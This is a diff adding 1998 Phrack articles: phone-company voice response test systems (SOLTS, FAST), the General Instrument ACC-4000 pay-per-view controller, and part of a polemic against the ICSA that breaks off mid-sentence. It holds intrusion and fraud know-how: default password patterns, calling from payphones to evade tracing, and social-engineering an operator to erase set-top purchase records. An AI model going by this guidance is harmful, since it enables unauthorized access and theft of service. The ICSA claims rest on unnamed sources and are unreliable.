+Small Office Loop Testing System (SOLTS) is a system used by telephone
+company field repair personnel to test a phone line from any touch-tone
+telephone.
+
+When dialing a SOLTS number, the first prompt is:
+
+        ~Please enter ID, terminate with #~
+
+SOLTS allows 30 seconds to enter a correct ID, then prompts:
+
+        ~Please enter line number and press #~
+
+SOLTS allows 60 seconds to enter a line number, then prompts:
+
+        ~Select mode, for help enter 0~
+
+SOLTS allows 60 seconds to choose one of six options:
+
+
+Enter:
+
+1) Interactive Testing
+2) Calling on test line
+3) Retrieve results
+8) Hang up
+9) Enter line number
+0) Help
+
+
+Option one allows testing the telephone line connected to the number
+entered in step two above. Option two tests the line the technician is
+calling from. Option three is used to retrieve the results generated
+using options one and two. Option eight disconnects from the system.
+Option nine allows a new line number to be entered for testing. Option
+zero accesses on-line help.
+
+
+    Mode 1 -- Interactive Testing
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+    #) Line test
+    1) Fault Location
+    2) Special tests
+    3) Completion Test
+    8) Hang up
+    9) Enter line number
+    0) Help
+
+
+        Line Test
+        ~~~~~~~~~
+        Perform a line test on the number entered, then:
+
+        7) Repeat Results
+        8) Hang up
+        9) Enter line number
+        0) Help
+
+
+        Fault Location
+        ~~~~~~~~~~~~~~
+        Performs initial line test on the number entered, then:
+
+        2) Next step
+        7) Repeat results
+        8) Hang up
+        9) Enter line number
+        0) Help
+
+
+        Special Tests
+        ~~~~~~~~~~~~~
+        Performs initial line test on the number entered, then:
+
+        #) Repeat line test
+        2) Loop and Ground
+        3) Pull dial tone
+        5) Pair ID Tone
+        7) Repeat results
+        8) Hang up
+        9) Enter line number
+        0) Help
+
+
+        Completion Test
+        ~~~~~~~~~~~~~~~
+
+        Performs a line test on the number entered, records the results,
+        then requests:
+
+        7) Repeat results
+        8) Hang up
+        9) Enter line number
+        0) Help
+
+
+    Mode 2 -- Calling On Test Line
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+        #) Line Test
+        3) Completion Test
+        8) Hang up
+        9) Enter line number
+        0) Help
+
+
+        Line Test
+        ~~~~~~~~~
+
+        Performs a line test on the number entered, if line is busy
+        requests Craft to hang up, performs a line test and stores the
+        results.
+
+        8) Hang up
+        9) Enter line number
+        0) Help
+
+        Completion Test
+        ~~~~~~~~~~~~~~~
+
+        Performs a line test on the number entered, if line is busy
+        requests Craft to hang up, performs a line test, and records the
+        results.
+
+        8) Hang up
+        9) Enter line number
+        0) Help
+
+
+    Mode 3 -- Retrieve Results
+    ~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+        States the stored results for the line number entered, then:
+
+        7) Repeat results
+        8) Hang up
+        9) Enter line number
+        0) Help
+
+
+
+
+
+                      +---------------------------+
+                      +         PART IV           +
+                      +                           +
+                      +            --             +
+                      +                           +
+                      + Field Access Service Tool +
+                      +                           +
+                      +        (F.A.S.T.)         +
+                      +---------------------------+
+
+When calling FAST, the first prompt is a request for a security code.
+The security code is usually the employee badge number. After the
+security code is entered and the # key is pressed, FAST will prompt for
+the password. The password is usually 4-7 digits long and usually
+expires every 30 days. The default password is usually the security
+code. After the password is entered and the # key is pressed the FAST
+New Notices and Features are played.
+
+After all of that, the FAST Main Menu is made available:
+
+FAST Main Menu
+
+1. Facilities Inquiry
+2. MLT Test
+3. Cut to new facilities
+4. Change Status of a cable and pair
+5. Test Caller-ID
+6. Close a Service Order
+7. Cable transfer (for splicers)
+8. Administrative
+9. News and documentation
+0. Connect call to Help Line
+
+1:	LFACS Inquiry
+	1. by phone number
+	2. by cable pair
+
+	1:	Enter telephone number
+		1. Correct
+		2. Re-enter
+
+		1. Current assignment
+		2. Spare pairs
+		3. Multiple appearances
+
+		1. F1 (feeder)
+		2. F2 (distribution)
+		3. F3 (if any)
+		4. All facilities in loop
+
+	2:	Enter wire center NXX
+		1. Correct
+		2. Re-enter
+
+		Enter cable number
+		1. Correct
+		2. Re-enter
+
+		Enter pair count
+		1. Correct
+		2. Re-enter
+
+		1. Current status
+		2. Spare pairs
+		3. Multiple appearances
+		4. Defective pair list
+		5. Another cable-pair
+		6. Another pair, same cable
+
+
+2:	MLT test
+	1. Quick
+	2. Loop
+	3. Full
+	4. Add tone
+	5. Remove tone
+
+	Tone: Enter telephone number
+	1. Correct
+	2. Re-enter
+	
+	Add tone - enter number of minutes of tone #
+
+	1. Another request
+	2. End call
+	3. Wait for tone
+
+
+3:	Cut to new facilities
+	1. Service Order
+	2. Trouble Ticket
+
+	1:	Service Order
+		1. C-Order
+		2. N-Order
+		3. T-Order
+		4. Other
+
+		Enter 6 digit numeric portion of order number
+		1. Correct
+		2. Re-enter
+	
+		+-----------------------------------+
+		| Go to "Hear F1 assignment" below. |
+		+-----------------------------------+
+	
+	2:	Trouble Ticket
+		Enter telephone number
+		1. Correct
+		2. Re-enter
+
+		Hear F1 assignment
+		1. Cut
+		2. Keep
+
+		Hear F2 assignment
+		1. Cut
+		2. Keep
+
+		Hear F3 assignment
+		1. Cut
+		2. Keep
+
+		+------------------------------------------+
+		| Go to "Specify code for bad pair" below. |
+		+------------------------------------------+
+
+
+4:	Change status of a cable/pair to defective or non-defective
+
+		Specify code for bad pair
+		1. GTP
+		2. OPN
+		3. OTP
+		4. UBL
+		5. SHT
+		6. GRG
+		7. CBY
+		8. Other
+
+			Other
+			1. Non-defective
+			2. Defective, unknown
+			3. Exposed
+			4. Split pair
+			5. Previous list
+
+		Specify pair to use
+		
+		Enter new cable number or only # if no change
+		1. Correct
+		2. Re-enter
+
+		Enter new pair number
+		1. Correct
+		2. Re-enter
+
+                FAST pages the technician to indicate the success
+                of the cut.
+
+		Note: If F1 is being cut both LFACS and COSMOS need
+                      updates. Two pager messages will be sent.
+
+                      If CF pair is used as spare, information will be
+                      given to break connection.
+
+
+5: 	Test Caller-ID
+	Enter 7 digit telephone number to be called.
+	1. Correct
+	2. Re-enter
+	3. Correct and calling from the number
+
+
+6:      Close Service Order
+	1. C-Order
+	2. N-Order
+	3. T-Order
+	4. Other
+
+	Enter 6 digit numeric portion of order number
+	1. Correct
+	2. Re-enter
+
+	1. Closed today
+	2. Closed yesterday
+	3. Other
+
+
+7:	Cable transfer
+	Enter TN from cut sheet
+	1. Correct EWO.xfer
+	2. Re-enter TN
+
+	Enter first item number
+	Enter last item number
+	1. Correct
+	2. Re-enter
+
+	To transfer this item:
+	1. Move to new equipment
+	2. Skip this item
+
+
+8:	Administrative
+	1. Change Password
+	2. Change 3 digit EC
+	3. Change 3 digit NPA
+
+
+9:	FAST News
+
+
+0:	FAST Help Line
+
+
+Notes:  When entering a variable number of digits, # is required to end entry.
+        When entering a fixed number of digits, # is not required.
+        Pressing 9 will always return to the main menu.
+
+	To enter alpha characters press * to enter alpha mode and then
+        use the following key sequences. Use * again to exit alpha mode.
+
+	For example: Voy866 would be *836393*866.
+
+	A	21
+	B	21
+	C	23
+	D	31
+	E	32
+	F	33
+	G	41
+	H	42
+	I	43
+	J	51
+	K	52
+	L	53
+	M	61
+	N	62
+	O	63
+	P	71
+	Q	01
+	R	73
+	S	73
+	T	81
+	U	82
+	V	83
+	W	91
+	X	92
+	Y	93
+	Z	03
+	-	11
+	.	12
+	+	13
+
+
+
+
+
+                             +------------+
+                             +   Part V   +
+                             +            +
+                             +    --      +
+                             +            +
+                             + Conclusion +
+                             +------------+
+
+
+Voice Response Systems can be a great deal of fun, and they can be
+safely accessed from a public telephone. Don't play with these from
+home. VRSs are a great way to hack without using a computer.
+
+For information on the Teradyne 4Tel VRS System, read the LOD/H
+Technical Journal, Issue #3: File 05 of 11: An Overview of the Teradyne
+4Tel System by Doom Prophet LOD/H.
+
+
+----[  EOF
+
diff --git a/phrack52/13.txt b/phrack52/13.txt
new file mode 100644
index 0000000..a5033ba
--- /dev/null
+++ b/phrack52/13.txt
@@ -0,0 +1,406 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 13 of 20
+
+
+-------------------------[  Pay Per View (you don't have to)
+
+
+--------[  Cavalier[TNO]
+
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+ I......................................................... Introduction
+ II........................................................ Automatic Windows
+ III....................................................... The Login Window
+ IV........................................................ The Main Menu
+ V......................................................... Other Menus
+ VI........................................................ Converter Types
+ VII....................................................... Scrambler Types
+ VIII...................................................... Scrambling Modes
+ IX........................................................ Security Notes
+ X......................................................... Conclusion
+
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+.--------------.
+| Introduction |
+`--------------'
+
+General Instruments sells more cable television equipment than any other
+manufacturer. Included in their product range is the ACC-4000. The
+ACC-4000 is a system that controls Pay-Per-View television.
+
+The ACC-4000 is a PC running SCO Open Desktop v3.0. Earlier ACC-4000s
+ran Interactive Unix. The interface for the ACC-4000 is X-Windows based,
+so you can hack your way to free pron through an attractive GUI.
+
+The ACC-4000 is often referred to as an addressable system. This means
+that each set-top-box can be addressed independently. This allows every
+subscriber to select their own programming -- and it allows the cable
+television company to bill the subscriber for every television show the
+subscriber selects.
+
+The cable television signal is normally sent by satellite to a cable
+headend. To translate this into terms that may be more comfortable to
+Phrack readers, the cable head end is similar to a telephone company
+central office. At the headend, the signal is scrambled to make it more
+difficult to view without paying.
+
+The ACC-4000 then routes the signal from the headend to the appropriate
+set-top-boxes. It does this by merging control information into the data
+stream before the data stream reaches the set-top-boxes. The ACC-4000
+can talk to one-way, FONE-way, and two-way set-top-boxes. The ACC-4000
+works over standard RF cable, fiber optics, microwave, and even
+telephone wiring.
+
+The ACC-4000 is capable of sending billing information to a cable
+television billing system, such as CableData, CSG, or Wizard.
+
+The ACC-4000 is a small system. The unit I examined was using a 486DX-50
+processor. Nevertheless, one ACC-4000 can manage a half a million set
+top boxes.
+
+Often you will find other General Instruments systems connected to the
+ACC-4000. A Data Provider Translator system can take input from outside
+sources and merge them into the data stream going to the set-top-boxes.
+This provides features like program guides, VCR IR codes, weather data,
+Near-Video-On-Demand (NVOD) schedules, or even custom logos and menus. A
+Message Editor system can be used to create custom "barker" messages for
+cable subscribers.
+
+
+.------------------.
+| Automatic Windows|
+`------------------'
+
+In addition to the login window, the ACC-4000 opens two other types of
+windows automatically to display information on the console. Using
+Xwatchwin to view these windows remotely can help you figure out what is
+going on with the system. The Windows are:
+
+                        . Logger Window
+                        . Wire Link X
+
+The window titled "Logger Window" contains status and error messages.
+
+The windows titled "Wire Link X" show data going from the ACC-4000 out
+to other systems, usually the billing system. There is one "Wire Link X"
+window for each system the ACC-4000 is feeding data.
+
+
+.------------------.
+| The Login Window |
+`------------------'
+
+The login window is extremely informative and looks something like this:
+
+ .---------------------------------------------------------------------------.
+ |          ACC4000                                                  Help    |
+ |          ~                                                        ~       |
+ |---------------------------------------------------------------------------|
+ |LOGIN  |       Login to ACC4000         |               |                  |
+ |---------------------------------------------------------------------------|
+ |         General Instruments Addressable Control System                    |
+ |User Name: #############################    Password: ########             |
+ |         COPYRIGHT (C) 1996. General Instrument Corporation                |
+ |---------------------------------------------------------------------------|
+ |Site Number: 866  Geocode: 303  Terminal: tno:0.0  Software Version: V8.66 |
+ |                                                                           |
+ | Number ANICS Installed: 1              Number of Subscriptions: 16        |
+ |  Parallel Data Streams: 1        1st Subscription Service Code: 1         |
+ |       List Maintenance: HOST     Number of Simultaneous Events: 48        |
+ |       Number List Maps: 8               1st Event Service Code: 89        |
+ |       Return Frequency: 08.9 Mhz         Data Stream Baud Rate: 13.97 Khz |
+ |                                                                           |
+ | Data Base Size: 288K Subscribers      Converter ID Usage: 32K Groups      |
+ |                                                                           |
+ | 1st group 1-way    2nd group phone    3rd group phone    4th group 2-way  |
+ | 5th group 2-way    6th group 2-way    7th group 2-way    8th group 2-way  |
+ | 9th group 2-way                                                           |
+ |                                                                           |
+ |---------------------------------------------------------------------------|
+ |Enter operator name                                                        |
+ |                                                                           |
+ |             F6:Clear Field     F7:Field Help        F8:Form Help          |
+ `---------------------------------------------------------------------------'
+
+
+        Site Number is assigned by General Instruments. This number is
+        also stored in the set-top-box.
+
+        Geocode is a optional number that may be assigned by the cable
+        television company to segment it's set-top-boxes into groups.
+
+        Terminal is the name of the X-windows terminal you are
+        connecting from.
+
+        Software Version is the release number of the ACC-4000 software.
+
+        Number ANICS Installed is the number of transmission devices
+        installed.
+
+        Parallel Data Streams is the number of simultaneous
+        transmissions into the data stream.
+
+        List Maintenance is always set to HOST. In the future, General
+        Instruments plans to allow the an ANIC to maintain the list of
+        authorizations.
+
+        Number List Maps is the size of the queue between the ACC-4000
+        and the ANIC.
+
+        Number of Subscriptions is the number of service codes allotted
+        for subscriptions.
+
+        1st Subscription Service Code is the first available scrambler
+        tag for descrambling subscriptions.
+
+        Number of Simultaneous Events is the maximum number of
+        simultaneous Pay-Per-View (PPV) events that can be available at
+        one time.
+
+        1st Event Service Code is the first available scrambling tag for
+        Pay-Per-View PPV events.
+
+        Return Frequency is the transmit frequency used by two-way set
+        top boxes. The range is normally 8.3 - 10.4Mhz.
+
+        Data Stream Baud Rate is the rate of transmission of the data
+        stream.
+
+        Data Base Size is the maximum number of set-top-boxes the system
+        is configured for.
+
+        Converter ID Usage is always set to 32k. This means that 32k
+        set-top-boxes can be grouped into a partition.
+
+        Groups shows the division of the total number of set-top-boxes
+        (data base size) into partitions.
+
+
+.---------------.
+| The Main Menu |
+`---------------'
+
+The Main Menu is the gateway to all other menus and looks something like
+this:
+
+ .---------------------------------------------------------------------------.
+ |MAINMENU  |    Main Menu of Screen Options     |       |records found      |
+ |                                                                           |
+ |.-------------------------------------------------------------------------.|
+ ||                                                                         ||
+ ||                 Main Menu of Screen Options                             ||
+ ||                                                                         ||
+ || 1. Converters              Convs     7. User Information         Users  ||
+ || 2. Services/Schedules      Svcs      8. Control System Functions System ||
+ || 3. Headend Equipment       Headend   9. Reports                  Reports||
+ || 4. Converter Types         ConvTyp  10. Data Path Configuration  DataCfg||
+ || 5. Data Files              Files    11. Message Management       MsgMgt ||
+ || 6. Business System Gateway Gateway  12. Return to Login          Exit   ||
+ ||                                                                         ||
+ ||                                                                         ||
+ || Enter Selection:                                                        ||
+ ||                                                                         ||
+ |`-------------------------------------------------------------------------'|
+ |                                                                           |
+ |---------------------------------------------------------------------------|
+ |Enter selection number or press function button                            |
+ |                                                                           |
+ |             F6:Clear Field     F7:Field Help        F8:Form Help          |
+ `---------------------------------------------------------------------------'
+
+
+.-------------.
+| Other Menus |
+`-------------'
+
+The ACC-4000 has many other menus that are accessed through the Main Menu.
+I will not waste time and space here describing these menus. If you gain
+access to an ACC-4000, the online help should be sufficient to aid you
+in using the system.
+
+These menus allow you to perform functions such as:
+
+                . Managing set-top-boxes
+                . Managing headend scramblers
+                . Sending messages to subscribers
+                . Performing opinion polls on subscribers
+                . Configuring available Pay-Per-View (PPV) events
+                . Managing purchase data
+                . Maintaining the ACC-4000 database
+                . Creating reports
+
+
+.-----------------.
+| Converter Types |
+`-----------------'
+
+The ACC-4000 system supports a large number of set-top-boxes:
+
+
+Type  Model                        Name                         Partition Type
+------------------------------------------------------------------------------
+ 1    DRZ                          STARCOM II, 400, 500         One-Way
+      (PROM based)
+ 2    DRZA-*A, DRZP-*A             STARCOM 450                  One-Way
+      (PROM based, 128 tags)       STARCOM 450/P3
+ 3    DRZI*-*A                     STARCOM 450/P3               One-Way
+      (PROM based, 256 tags)
+ 4    DRZI*-AT                     STARCOM 450                  Two-Way
+ 5    XT5-*1*                      STARCOM V                    One-Way
+ 6    XT5-*2*                      STARCOM V                    Two-Way
+ 7    DRZI*-*AV                    STARCOM 450                  One-Way
+ 8    DP*5-*3*                     STARCOM VI+                  Fone-Way
+ 9    DL4/DL4A                     STARCOM V                    One-Way
+10    DP*5-*1*                     STARCOM VI+                  One-Way
+11    DP*5-*2*                     STARCOM VI+                  Two-Way
+12    DPBB-*1*                     STARCOM VI+                  One-Way
+13    DPBB-*3*                     STARCOM VI+                  FONE-Way
+14    DPBB-*2*                     STARCOM VI+                  Two-Way
+15    DP711*, DPV721*, DPV721*/C1  STARCOM 7100/7200            One-Way
+16    DP713*, DPV723*, DPV723*/C1  STARCOM 7100/7200            FONE-Way
+17    DP712*, DPV722*, DPV722*/C1  STARCOM 7100/7200            Two-Way
+18    DPBB7-*1*                    STARCOM 7300                 One-Way
+19    DPBB7-*3*                    STARCOM 7300                 FONE-Way
+20    DPBB7-*2*                    STARCOM 7300                 Two-Way
+21    DPBB-*1*-M1                  STARCOM VI+ M/S              One-Way
+22    DPBB-*3*-M1                  STARCOM VI+ M/S              FONE-Way
+23    DPBB-*2*-M1                  STARCOM VI+ M/S              Two-Way
+24    IDP7, LMDS-A, MMDS-A/CT1900  IDP7, LMDS-A, MMDS-A/CT1900  One-Way
+25    IDP7, LMDS-A, MMDS-A/CT1900  IDP7, LMDS-A, MMDS-A/CT1900  FONE-Way
+26    IDP7, LMDS-A, MMDS-A/CT1900  IDP7, LMDS-A, MMDS-A/CT1900  Two-Way
+27    DCR                          DCR                          One-Way
+28    DCR 3000S/4000S              DCR                          One-Way
+30    CFT2000/2100                 CFT2000/2100                 One-Way
+31    CFT2000/2100                 CFT2000/2100                 FONE-Way
+32    CFT2000/2100                 CFT2000/2100                 Two-Way
+33    STARPORT                     STARPORT                     One-Way
+34    STARPORT (not implemented)   STARPORT                     FONE-Way
+35    STARPORT (not implemented)   STARPORT                     Two-Way
+36    CFT2200                      CFT2200                      One-Way
+37    CFT2200                      CFT2200 STARFONE             FONE-Way
+38    CFT2200                      CFT2200 STARVUE              Two-Way
+39    CFT2900                      CFT2900                      One-Way
+40    CFT2900                      CFT2900                      FONE-Way
+41    CFT2900                      CFT2900                      Two-Way
+42    Sega                         Sega                         One-Way
+
+
+.-----------------.
+| Scrambler Types |
+`-----------------'
+
+The ACC-4000 system supports several different types of scramblers at the
+headend, including:
+
+STARPACK Service Encoder (SSE)
+
+        An older scrambler that scrambles with standby and 6db constant
+        sync-suppression scrambling modes.
+
+Digital Scrambler/Encoder (DS/E)
+
+        An older RF scrambler.
+
+Digital Video/Encoder (DV/E)
+
+        An older baseband scrambler, used to further scramble DS/E
+        signals.
+
+Video Processor/Encoder (VP/E)
+
+        A DS/E and a DV/E together.
+
+Modulating Video Processor (MVP) and MVPII
+
+        A newer scrambler.
+
+Modulating Video Processor (MVP) II-DIU
+
+        A MVPII with a Data Inserter Module (DIM) to enable data insertion.
+
+
+.------------------.
+| Scrambling Modes |
+`------------------'
+
+The ACC-4000 controls scramblers using several modes of scrambling, including:
+
+        . Sync Suppression
+        . Video Inversion
+        . Audio Inversion
+
+Supported sync suppression submodes are:
+
+        . Standby
+        . Clear, 0db constant
+        . 6db constant
+        . 10db constant
+        . Scene change, 3 seconds
+        . 6/10 pseudo-random, 30 seconds
+        . 6/10 pseudo-random, 1 minute
+        . 6/10 pseudo-random, 16 tics
+        . 6/10 pseudo-random, 3 seconds
+
+When using scene change or 6/10 pseudo-random sync suppression, the
+ACC-4000 supports a number of dynamic mode types:
+
+        . Pseudo-random 6/10/clear
+        . Pseudo-random 6/clear
+        . Pseudo-random 10/clear
+        . Pseudo-random 6/10
+        . Linear 6/10/clear
+        . Linear 6/clear
+        . Linear 10/clear
+        . Linear 6/10
+
+In addition, you can set the interval between dynamic mode time changes
+in hours, minutes, seconds, or tics.
+
+Supported video inversion submodes are:
+
+        . Clear
+        . Scene change field inversion
+        . Constant video inversion
+        . Timed field inversion
+
+Note: Video and audio inversion only work with baseband set-top-boxes.
+
+
+.---------------.
+| Security Notes|
+`---------------'
+
+These systems normally have modems for use by both General Instruments
+personnel and cable company personnel.  General Instruments personnel
+dial in to diagnose problems with the system.  Cable company personnel
+dial in to change Pay-Per-View (PPV) programming or to configure
+customer set-top-boxes.
+
+Any uncollected purchases are lost when a set-top-box is initialized.
+To preserve uncollected purchases, the operator will do a Refresh
+instead of an Initialize. If you can talk the operator into doing an
+Initialization instead of a Refresh, any uncollected purchases not
+already forwarded to the billing system will be lost.
+
+Purchases are stored as integers. Older set-top-boxes were limited to
+storing 16 purchases. Newer set-top-boxes are limited to storing 63
+purchases.
+
+
+.------------.
+| Conclusion |
+`------------'
+
+If you can access a system such as the ACC-4000, you can have great fun.
+Be careful when giving everyone in your city free access to WWF.
+
+
+----[  EOF
+
diff --git a/phrack52/14.txt b/phrack52/14.txt
new file mode 100644
index 0000000..58eb125
--- /dev/null
+++ b/phrack52/14.txt
@@ -0,0 +1,383 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 14 of 20
+
+
+-------------------------[  The International Crime Syndicate Association
+
+
+--------[  Dorathea Demming
+
+      
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+  =                                                                         =
+  =                                ICSA                                     =
+  =                                                                         =
+  =               International Computer Security Association                =
+  =                                                                         =
+  =                                 or                                      =
+  =                                                                         =
+  =               International Crime Syndicate Association?                =
+  =                                                                         =
+  =                                                                         =
+  =                                 by                                      =
+  =                                                                         =
+  =                          Dorathea Demming                               =
+  =                                                                         =
+  =                                                                         =
+  =                                                                         =
+  =                  (c) Dorathea Demming,  October, 1997                   =
+  =                                                                         =
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+This is an article about computer criminals. I'm not talking about the fun
+loving kids of the Farmers of Doom [FOD], the cool pranksters of the Legion of 
+Doom [LOD], or even the black-tie techno terrorists of The New Order [TNO].
+I'm talking about professional computer criminals.  I'm talking about the
+types of folks that go to work every day and make a living by ripping off
+guileless corporations.  I'm talking about the International Computer Security
+Association [ICSA].  The ICSA has made more money off of computer fraud than
+the other three organizations mentioned above combined.
+
+ICSA was previously known as National Computer Security Association [NCSA].
+It seems that they finally discovered that there are networks and gullible
+corporations in countries other than the United States.
+
+In this article I will inform you of the cluelessness and greed of ICSA.
+Instead of telling you, I will let them tell you in their own words.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Lets look at what the NSCA has to say about it's history:
+
+        "the company was founded in 1989 to provide independent and
+        objective services to a rapidly growing and often confusing
+        digital security marketplace through a market-driven, for-profit
+        consortium model."
+
+This is where the ICSA differs from real industry organizations like the IEEE.
+Non-profit organizations like the IEEE can provide independent and objective
+services, for-profit organizations like ICSA cannot be trusted to do so.
+The goal of the NSCA is profit, nothing more and nothing less.
+
+Profit is a desirable goal in a business.  However, the ICSA pretends to be
+an industry association.  This is a complete and total fabrication.  ICSA is
+not an industry association -- it is a for-profit enterprise that competes for 
+business directly with the companies it pretends to help.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at the ICSA's knowledge of computer security:
+
+"Early computer security issues focused on virus protection. "
+
+This is where the ICSA accidentally informs us if their true history.  No one
+with half of a clue would claim that "Early computer security issues focused
+on virus protection."  In reality, early computer security issues focused on
+the protection of mainframe systems.  Virus protection did not become a
+concern until the 1980's.  We can only conclude that no one at the ICSA has a
+background in computer security outside of personal computer security.  These
+folks seem to be Unix illiterate -- not to speak of VM, MVS, OS/400, AOS/VS,
+VMS or a host of other systems where corporations store vast amounts of data.
+Focusing primarily on PC security will not benefit the overall security
+posture of your organization.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at another baseless claim of the ISCA:
+
+        "ICSA consortia facilitate an open exchange of information among
+        security industry product developers and security service
+        providers within narrow, but well defined segments of the
+        computer security industry."
+
+According to the "security industry product developers and security service
+providers" that I have spoken with, this is complete hogwash.  The word on the 
+street is that the ICSA folks collect information and then give nothing useful 
+in return.  My response is "How could they?"  No one at ICSA has any
+information to offer.  You would do as well to ask your 12 year old daughter
+for information about computer security -- and you might even do better, if
+your daughter reads Phrack.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at what the ICSA has to say about their Web Certification program:
+
+        "The ICSA Web Certification materially reduces web site risks
+       and liability for both operator and visitor by providing,
+       verifying and improving the use of logical, physical and
+       operational baseline security standards and practices."
+
+       "Comprised of a detailed certification field guide, on-site
+       evaluation, remote test, random spot checks, and an evolving set
+       of endorsed best practices, ICSA certification uniquely
+       demonstrates management's efforts to assure site availability,
+       information protection, and data integrity as well as enhanced
+       user confidence and trust."
+
+
+What really happens is that ICSA sends out a reseller to your site.  The
+reseller then asks you if you have set up your site correctly.  You tell the
+reseller that you have, and then the reseller tells ICSA that you have set up
+your site correctly. Very few items are actually verified by the reseller.
+ICSA then runs ISS (Internet Security Scanner) against your web server.  If ISS
+cannot detect any security vulnerabilities remotely, you receive ICSA Web
+Certification.
+
+For grilling your staff with a series of almost meaningless questions, the
+reseller receives $2,975 US dollars.  For running ISS against your web server,
+ICSA receives $5,525.  For $19. 95, you can buy a copy of Computer Security
+Basics by Deborah Russell and G.T. Gangemi Sr. (ISBN:0-937175-71-4) and save
+your company almost $8,500.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at the ICSA's Reseller Training:
+
+ICSA states that every reseller that delivers their product is trained in
+computer security.  In practice, however, this training is actually _sales_
+training.  The ICSA training course lasts for less than one day and is
+supposed to be conducted by two trainers, one sales person and one technical
+person.  One recipient of this training told me that the technical person did
+not bother to show up for his training, while another recipient of this
+training told me that ICSA instead sent _two_ sales people and _no_ technical
+people to his training.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at what ICSA says about change in the "digital world" of
+firewalls:
+
+        "The digital world moves far too quickly to certify only a
+        particular version of a product or a particular incarnation of a
+        system.  Therefore, ICSA certification criteria and processes are
+        designed so that once a product or system is certified, all
+        future versions of the product (or updates of the system) are
+        inherently certified."
+
+
+What does this mean to you?  It means that ICSA is certifying firewalls
+running code that they have never seen.  It means that if you purchase a
+firewall that has been ICSA certified -- you have no way of knowing if the
+version of the firewall product that is protecting your organization has ever
+been certified.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at how ICSA defends itself from such allegations?  ISCA has
+three ready made defenses:
+
+        "First, the ICSA gains a contractual commitment from the
+        product vendor or the organization that owns or runs the
+        certified system that the product or system will be maintained
+        at the current, published ICSA certification standards. "
+
+So that's how ICSA certification works, the firewall vendors promise to write
+good code and ICSA gives them a sticker.  This works fine with little children
+in Sunday school, but I wouldn't trust the security of my business to such a
+plan.
+
+        "Secondly, ICSA or it's authorized partners normally perform
+        random spot checking of the current product (or system) against
+        current ICSA criteria for that certification category. "
+
+Except, of course, that an unnamed source within ICSA itself admitted that
+these spot checks are not actually being done.  That's right, these spot
+checks exist only in the minds of the marketing staff of the ICSA.  ICSA
+cannot manage to cover the costs of spot checking in their exorbitant fee
+structure.  They must be spending the money instead on all of those free
+televisions they are giving away to their resellers.
+
+        "Thirdly, ICSA certification is renewed annually. At renewal
+        time, the full certification process is repeated for the current
+        production system or shipping products against the current
+        criteria. "
+
+Well here we have the final promise -- our systems will never out of
+certification for more than 364 days.  If our firewall vendor ships three new
+releases a year -- at least one of them will go through the actual ICSA
+certification process. Of course, all of them will have the ICSA certification
+sticker.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's looks at what ICSA has to say about their procedures:
+
+        "The certification criteria is not primarily based on
+        fundamental design or engineering principles or on an assessment
+        of underlying technology. In most cases, we strive to use a
+        black-box approach. "
+
+Listen to what they are really saying here.  They are admitting that their
+certification process does not deal with "fundamental design or engineering
+principles" or on an "assessment of underlying technology".  What else is left
+to base a certification upon?  Do they certify firewalls based upon the
+firewall vendors marketing brochures?  Upon the color of their product boxes?
+Upon the friendliness of their sales staff?  Or maybe they just certify anyone
+who gives them money.
+
+When you are clueless, every computer system must look like a "black-
+box" to you.
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+
+Let's look at how the ICSA web certification process deals with CGI
+vulnerabilities:
+
+        "The Site Operator attest that CGIs have been reviewed by
+        qualified reviewers against design criteria that affect
+        security. "  (sic)
+
+
+Let's take a close look at this.  The #1 method of breaking into web servers
+is to attack a vulnerable CGI program.  And the full extent that the ICSA
+certification deals with secure CGI programming is to have your staff attest
+that they have done a good job.  What sort of employee would respond "Oh no,
+we haven't even looked at the security of those CGI bins?"  The ICSA counts on 
+employees trying to save their jobs to speed the certification process along
+to it's conclusion.
+
+
+  =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+Let's look at what ICSA has to say about it's own thoroughness:
+
+        "Because it is neither practical nor cost effective, ICSA does
+        not test and certify every possible combination of web sites on
+        a web server at various locations unless requested to, and
+        compensated for, by Customer. "
+
+We all know that security is breached at it's weakest link, not it's
